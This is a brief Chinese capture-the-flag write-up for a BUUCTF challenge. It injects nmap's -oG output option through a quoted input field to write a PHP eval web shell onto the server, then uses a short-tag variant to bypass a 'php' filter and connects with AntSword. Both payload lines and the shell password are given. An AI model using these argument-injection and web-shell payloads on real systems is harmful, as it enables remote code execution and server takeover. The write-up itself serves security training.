这道题与[BUUCTF 2018]Online Tool的解题方式一些有些类似,都是利用nmap上传文件连接,主要考察nmap的一些用法
首先右击查看源码,提示flag在/flag下
进行简单的ping操作
nmap下的选项
-
-oN 标准保存
-
-oX XML保存
-
-oG Grep保存
-
-oA 所有格式保存
构造payload:' <?php @eval($_POST["hack"]);?> -oG hack.php '
php被过滤,使用短标绕过后蚁剑连接
payload:' <?= @eval($_POST["ganyu"]);?> -oG gy.phtml '
链接:http://2a30223b-142b-4557-a92c-7bc56c2f39b0.node4.buuoj.cn:81/gy.phtml
密码:ganyu